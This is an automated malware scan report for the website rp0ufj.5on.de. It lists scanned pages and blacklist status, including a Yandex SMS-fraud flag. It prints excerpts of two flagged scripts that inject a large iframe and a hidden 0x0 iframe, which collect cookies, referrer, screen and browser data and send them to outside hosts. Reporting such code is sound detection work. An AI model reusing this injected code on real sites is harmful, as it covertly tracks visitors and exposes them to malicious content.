New scan:

Malware Scanner report for rp0ufj.5on.de

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as SMS-fraud resource.

The website "rp0ufj.5on.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/4
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rp0ufj.5on.de

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rp0ufj.5on.de/

Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.rp0ufj.5on.de/
200 OK
Content-Length: 25934
Content-Type: text/html
clean
http://pw.29hhh.com/head.js
200 OK
Content-Length: 1859
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >");
document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=1500 width=100%></iframe>");
document.writeln("<\/div>");

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
... 977 bytes are skipped ...
r yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count46.51yes.com/sa.htm?id=463789186'+yesdata+' height=0 width=0></iframe>');

Antivirus reports:

NANO-Antivirus
Trojan.Url.IframeB.rsbhf

Hidden iFrame found.
size: 0x0     
src: http://count46.51yes.com/sa.htm?id=463789186

<iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count46.51yes.com/sa.htm?id=463789186'+yesdata+' height=0 width=0>

http://pw.29hhh.com/footer.js
200 OK
Content-Length: 1859
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.writeln("<div align=\"center\" style=\"background-color:#FFFFFF;width:100%;\" >");
document.writeln("<iframe src=http://www.61172.com/?do=top MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 frameborder=0 height=1500 width=100%></iframe>");
document.writeln("<\/div>");

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
... 977 bytes are skipped ...
r yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count46.51yes.com/sa.htm?id=463789186'+yesdata+' height=0 width=0></iframe>');

Antivirus reports:

NANO-Antivirus
Trojan.Url.IframeB.rsbhf

Hidden iFrame found.
size: 0x0     
src: http://count46.51yes.com/sa.htm?id=463789186

<iframe marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no src=http://count46.51yes.com/sa.htm?id=463789186'+yesdata+' height=0 width=0>

http://www.rp0ufj.5on.de/post/470-1.html
200 OK
Content-Length: 22337
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/1763-1.html
200 OK
Content-Length: 20806
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/68-1.html
200 OK
Content-Length: 24465
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/538-1.html
200 OK
Content-Length: 22718
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/1737-1.html
200 OK
Content-Length: 21926
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/778-1.html
200 OK
Content-Length: 21146
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/552-1.html
200 OK
Content-Length: 21140
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/1687-1.html
200 OK
Content-Length: 22910
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/317-1.html
200 OK
Content-Length: 20718
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/296-1.html
200 OK
Content-Length: 22289
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/1932-1.html
200 OK
Content-Length: 21166
Content-Type: text/html
clean
http://www.rp0ufj.5on.de/post/492-1.html
200 OK
Content-Length: 27773
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rp0ufj.5on.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: rp0ufj.5on.de
Referer: http://www.google.com/search?q=rp0ufj.5on.de

Result:
The result is similar to the first query. There are no suspicious redirects found.